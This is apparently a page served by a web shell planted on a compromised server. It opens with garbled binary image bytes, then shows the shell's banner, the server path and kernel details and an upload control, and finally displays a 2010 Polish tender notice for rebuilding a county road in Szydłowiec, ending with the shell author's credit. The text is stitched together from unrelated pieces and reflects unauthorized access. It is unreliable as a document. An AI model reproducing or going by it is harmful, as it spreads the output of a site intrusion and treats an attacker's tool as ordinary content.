JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100122/14889-N-2010.html

<p class="kh_header"><b>Szydłowiec: Przebudowa drogi powiatowej nr 4003W  Szydłowiec -Antoniów -gr. woj.</b><br>
<b>Numer ogłoszenia: 14889 - 2010; data zamieszczenia: 22.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu w Szydłowcu , pl. M. Konopnickiej 7, 26-500 Szydłowiec, woj. mazowieckie, tel. 048 6171008, faks 048 6171061.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szydlowiecpowiat.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi powiatowej nr 4003W  Szydłowiec -Antoniów -gr. woj..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Realizacja zadania obejmuje:
Przebudowę drogi powiatowej nr 4003W  Szydłowiec -Antoniów -gr. woj. na odcinkach :
od  km 0+714 do km 0+984, od km 2+567 do km 5+670, od km 8+869,09 do km 10+726 
Zakres zamówienia obejmuje wykonanie między innymi następujące roboty :
Od km 0+714 do km 0+984 
1. Roboty pomiarowe - 0,27 km
2. Rozebranie istn.krawężnika - 256,0 m
3. Rozebranie nawierzchni z elementów bet. - 516,50 m
4. Wykonanie wykopu z wyprofilowaniem i zagęszczeniem podloża-172,15 m3
5. Ustawienie krawężnika bet. 20x30x100 na ławie bet. - 270,0 m
6. Warstwa odsączająca z piasku średniego gr.10 cm - 540,0 m2
7. Podbudowa z gruntu stabilizowanego cementem grub.12 cm - 488,0 m2
8. Podbudowa z gruntu stabilizowanego cementem grub. 15 cm - 56,4 m2
9. Wykonanie zjazdów z kostki bet.grub.8cm - 56,4 m2
10. Wykonanie chodnika z kostki bet.grub.6cm - 488,0 m2
11. Ustawienie obrzeży bet. 8x30x100 - 15,0 m
12. Ustawienie barier U-11a - 16,0 m
13. Regulacja istn.studni telekomunikacyjnych - 6,0 szt.
14. Regulacja istn. zasuw gazowych - 2,0 szt.
15. Obcięcie nawierzchni z betonu asfaltowego - 270,0 m 
16. Podbudowa z chudego betonu grub.20 cm - 135,0 m2
17. Warstwa wiążąca z bet.asfalt. grub. 4 cm - 135,0 m2
18. Warstwa ścieralna z bet.asfalt. grub.4cm - 135,0 m2

Od km 2+567 do km 5+670
1. Roboty pomiarowe - 3,1 km
2. Rozebranie nawierzchni jezdni - 61,0 m2
3. Rozebranie nawierzchni betonowej - 168,0 m2
4. Rozebranie nawierzchni z elementów betonowych - 100,0 m2
5. Wycinka krzewów wraz z wywozem gałęzi karpin - 340,0 m2  
6. Wykonanie wykopu pod poszerzenia, pobocza i przepusty - 4122,19 m3
7. Wykonanie wykopu z wyprofilowaniem i zagęszczeniem podłoża-389,88 m3
8. Wykonanie nasypu pod przepusty pod zjazdami i pod drogą - 91,66 m3
9. Warstwa odsączająca grub. 10 cm - 1672,50 m3
10. Warstwa odsączająca grub. 20 cm - 1654,55
11. Podbudowa z kruszywa łamanego grub.24 cm na poszerzeniach - 1654,55 m2
12. Podbudowa z kruszywa łamanego grub. 15 cm - !672,50 m2 
13. Oczyszczenie i skropienie warstw bitumicznej emulsją - 15867,67 m2
14. Oczyszczenie i skropienie warstw niebitumicznych emulsją - 15978,66 m2
15. Warstwa wyrównawcza z betonu asfaltowego grub. średnio 5 cm - 1582,05 Mg
16. Ułożenie siatki ARMAPAL o szerokości 0,75 m z przymocowaniem do podłoża - 1491 m2
17. Warstwa ścieralna z betonu asfaltowego 0/12,8 mm o Gru. 4cm - 12060,64 m2 
18. Warstwa ścieralna z betonu asfaltowego 0/8 mm o grub. 4cm-3649,92 m2
19. Wykonanie zjazdów o nawierzchni z kruszywa łamanego Gru. Warstwy 10 cm - 2677,80 m2
20. Wykonanie przepustów pod zjazdami z rur żelbetowych wraz ze ściankami czołowymi - 665,0 m
21. Wykonanie przepustów o średnicy 600 mm wraz ze ściankami czołowymi - 57,0 m
22. Wykonanie utwardzonego pobocza z kostki betonowej gr. 8cm-1672,50 m2
23. Ustawienie obrzeży bet. 8x30x100 na ławie z betonu B10 - 1115,0 m
24. Ustawienie obrzeży bet. 10x30x100 na ławie z betonu B10 - 1115,0 m
25. Wykonanie utwardzonego pobocza z kruszywa o gr.warstwy 10 cm - 5091,0 m2
26. Wykonanie pobocza gruntowego - 786 m2
27. Renowacja rowów drogowych - 5372,40 m
28. Wykonanie trawnika z warstwy humusu o grub. 10cm - 111,50 m2 
29. Regulacja istn. studni`telekomunikacyjnych - 4 szt.
30. Regulacja istn. zasuw wodociągowych - 10 szt.
31. Warstwa odsączająca gr. 10 cm - 1150,50 m2
32. Podbudowa z kruszywa łamanego grub. 15cm - 1150,50 m2
33. Wykonanie utwardzonego pobocza z kostki betonowej gr. 8cm-1150,50 m2
34. Ustawienie obrzeży bet. 8x30x100 na ławie z betonu B10 - 767,0 m
35. Ustawienie obrzeży bet. 10x30x100 na ławie z betonu B10 - 767,0 m
36. Obcięcie nawierzchni z betonu asfaltowego - 767,0 m 
37. Podbudowa z chudego betonu grub.15 cm -  230,10 m2
38. Warstwa wiążąca z bet.asfalt. grub. 4 cm -  230,10 m2
39. Warstwa ścieralna z bet.asfalt. grub.4cm -  230,10 m2

Od km 8+869,09 do km 10+726
1. Roboty pomiarowe - 1,86 km
2. Rozebranie nawierzchni z betonu asfalt.(frezowanie) - 50,0 m2
3. Rozebranie nawierzchni betonowej - 60,0 m2 
4. Rozebranie nawierzchni z elementów bet. - 60,0 m2
5. Wycinka krzaków z wywozem gałęzi i karpin - 264,46 m2 
6. Wykopy pod poszerzenia,chodnik,zjazdy,pobocze - 2196,58 m3
7. Wykopy pod przepusty - 345,60 m3
8. Wykonanie nasypu  - 64,0 m3
9. Warstwa odsączająca z piasku grub. 10cm - 4046,71 m2
10. Warstwa odsączająca z piasku grub.15cm - 375,10 m2
11. Warstwa odsączająca z piasku grub. 20 cm - 989,82 m2
12. Podbudowa z kruszywa na poszerzeniach grub.24cm - 989,82 m2
13. Podbudowa z chudego betonu grub. 20cm na poszerzeniach przy chodniku - 375,10 m2 
14. Podbudowa z gruntu stabilizowanego cementem grub. 12 cm -3206,55 m2
15. Podbudowa z gruntu stabilizowanego cementem grub. 15cm - 1156,91 m2
16. Oczyszczenie i skropienie w-wy bitumicznej emulsją asfaltową -10480,65 m2
17. Oczyszczenie i skropienie warstw niebitumicznych emulsją asfalt. - 10595,55 m2
18. W-wa wyrównawcza z bet.asfaltowego grub. 4cm - 1059,55 Mg 
19. Ułożenie siatki ARMAPAL o szer. 0,75m - 1436,15 m2
20. Warstwa ścieralna z bet.asfalt. o grub. 4cm - 10480,65 m2
21. Wykonanie zjazdów o nawierzchni z kostki bet. gr. 8cm - 1156,91 m2 
22. Wykonanie zjazdów o nawierzchni z kruszywa łamanego - 1366,98 m2
23. Ustawienie krawężnika bet. 15x30x100 na ławie z betonu - 1875,48 m2
24. Wykonanie przepustów pod zjazdami z rur żelbetowych - 640,0 m
25. Chodnik z kostki betonowej gr.6cm - 3206,55 m2
26. Ustawienie obrzeży bet.8x30x100 - 2645,80 m
27. Wykonanie studzienek ściekowych - 13 szt.
28. Wykonanie studzienki ściekowej z włączeniem do istn.przepustu - 1 szt.
29. Wykonanie przykanalika z rur PVC - 39,0 m
30. Wykonanie umocnionego wylotu z przykanalika - 13 szt.
31. Adaptacja istn. przepustu 3x1000mm - 1 szt.
32. Adaptacja istn. przepustu prostokątnego - 1 szt.
33. Adaptacja istn. przepustu o średnicy 600mm - 1 szt.
34. Wykonanie utwardzenia pobocza kruszywem - 1895,91 m2
35. Wykonanie pobocza gruntowego - 420,0 m2
36. Renowacja rowów drogowych - 1260,91 m
37. Umocnienie rowu bloczkami i płytami ażurowymi - 1856,91 m
38. Wykonanie trawnika - 84,33 m2
39. Regulacja istn studni telekomunik. - 1 szt.
40. Regulacja istn.zasuw wodociągowych - 15 szt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.20-7, 45.11.12.00-0, 45.23.24.52-5, 45.23.32.22-1, 45.23.31.20-6, 45.11.21.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda od wykonawców wniesienia wadium. Wykonawca przystępując do przetargu jest obowiązany wpłacić/wnieść wadium w wysokości 65 000,00 zł (słownie: sześćdziesiąt pięć tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2) spełniają warunki określone w art. 22 ust. 1 ustawy z 29.01.2004 r. - Prawo Zamówień Publicznych, wykonanie w ciągu ostatnich 3 latach przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie robót budowlanych odpowiadającym swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia tj. zrealizowanie robót polegających na budowie, przebudowie lub remoncie drogi ( drogi, ulicy ) o łącznej wartość nie mniejszej niż 3 000 000,00 złotych brutto (słownie: trzy miliony zł brutto) w co najmniej jednym roku.
3) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
4) przyjmują warunki umowy,
5) złożyli ofertę oraz wszystkie wymagane dokumenty, oświadczenia przedstawione w pkt. 6 SIWZ, potwierdzające spełnienie wyżej wymienionych warunków.
2. Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu.
1) W toku badania  i oceny ofert,  Zamawiający będzie posługiwał się kryterium (spełnia-nie spełnia). Zgodnie z art. 87 ust. 1 ustawy z dnia 29.01.2004 r. - PZP zamawiający może żądać od wykonawców wyjaśnień dotyczących treści  złożonych ofert. Niedopuszczalne jest prowadzenie między zamawiającym a wykonawcą negocjacji dotyczących złożonej oferty oraz dokonywanie jakiejkolwiek zmiany w jej treści z zastrzeżeniem art. 88 ustawy PZP.
2) Wykonawca, który nie złoży wymaganych w SIWZ informacji i dokumentów potwierdzających spełnienie warunków udziału w postępowaniu lub złoży dokumenty w niewłaściwej formie, lub nie spełni innych wymagań określonych w ustawie PZP, SIWZ lub innych przepisach obowiązującego prawa, zostanie wykluczony z udziału w postępowaniu przetargowym na podstawie art. 24 ustawy PZP. 
3) Zgodnie z art. 26 ust. 3 ustawy PZP zamawiający wezwie wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub którzy złożyli dokumenty  zawierające błędy do ich uzupełnienia w wyznaczonym terminie, chyba że mimo ich uzupełnienia konieczne byłoby unieważnienie postępowania. Zamawiający wezwie także zgodnie z art. 26 ust. 4  w wyznaczonym przez siebie terminie, do złożenia wyjaśnień dotyczących oświadczeń i dokumentów, o których  mowa w art. 25 ust. 1.
4) Oferta wykonawcy wykluczonego uznana zostanie za odrzuconą i nie będzie podlegać dalszej ocenie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, wykonawca składa następujące dokumenty:
1. Dokumenty wymagane:
1) formularz ofertowy z wykorzystaniem wzoru-załącznik nr 1,
2) aktualny odpis z właściwego rejestru lub aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionej nie wcześniej niż 6 miesięcy przed upływem składania ofert. W przypadku składania oferty wspólnej w/w dokument składa każdy z wykonawców składających wspólną ofertę. Wymagana forma dokumentu-oryginał lub kserokopia poświadczona za zgodność z oryginałem przez wykonawcę. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast powyższego dokumentu składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, nie wydaje się wymienionego dokumentu, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Dokument ten powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
3) dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają odpowiednie uprawnienia tj.: uprawnienia budowlane osoby będącej kierownikiem budowy wraz z aktualnym zaświadczeniem o przynależności do Okręgowej Izby Samorządu Zawodowego;
4) wykaz wykonanych robót budowlanych- załącznik nr 5 w okresie ostatnich trzech latach przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania z załączeniem dokumentów potwierdzających , że roboty te zostały wykonane należycie (np. referencje, opinie zamawiających, ewentualnie kopie protokółów odbioru). W w/w wykazie powinny znaleźć się roboty polegające na budowie, przebudowie lub remoncie drogi (dróg, ulic) o łącznej wartość nie mniejszej niż 3 000 000,00 złotych brutto (słownie: trzy miliony zł brutto) w co najmniej jednym roku. 
5) oświadczenie do postępowania o zamówienie publiczne z art. 22 ust.1 ustawy Prawo zamówień publicznych z wykorzystaniem wzoru- załącznik nr 2,
6) Kosztorys ofertowy sporządzony w oparciu o przedmiar robót stanowiący  załącznik Nr 3 i specyfikację techniczną wykonania i odbioru robót stanowiącą załącznik Nr 4.
7) Wykaz robót (części zamówienia), których wykonanie Wykonawca zamierza powierzyć podwykonawcom-zawarty w formularzu oferty.
8) W przypadku, gdy Wykonawcę w przetargu reprezentuje pełnomocnik oryginał pełnomocnictwa do działania w imieniu Wykonawcy lub notarialnie potwierdzony odpis takiego pełnomocnictwa
9) Wykonawcy wspólnie ubiegający się o zamówienie zobowiązani są załączyć oryginał pełnomocnictwa do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Dokument pełnomocnictwa powinien być dołączony do oferty i zawierać w szczególności wskazanie postępowania o zamówienie publiczne, którego dotyczy, Wykonawców ubiegających się wspólnie o udzielenie zamówienia , ustanowionego jako Pełnomocnika przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji danego Wykonawcy. Stosowne odpisy z rejestru lub ewidencji powinny zostać dołączone do oferty.
10) Oświadczenie, że oferowane roboty budowlane spełniają wymagania określone przez Zamawiającego - zawarte w formularzu oferty.
11) Dowód wpłaty wadium.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szydlowiecpowiat.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Szydłowcu
pl. M. Konopnickiej 7
26-500 Szydłowiec
pokój numer 14 (II piętro).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.02.2010 godzina 10:00, miejsce: Starostwo Powiatowe w Szydłowcu
pl. M. Konopnickiej 7
26-500 Szydłowiec
sekretariat, I piętro (pokój nr 11).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com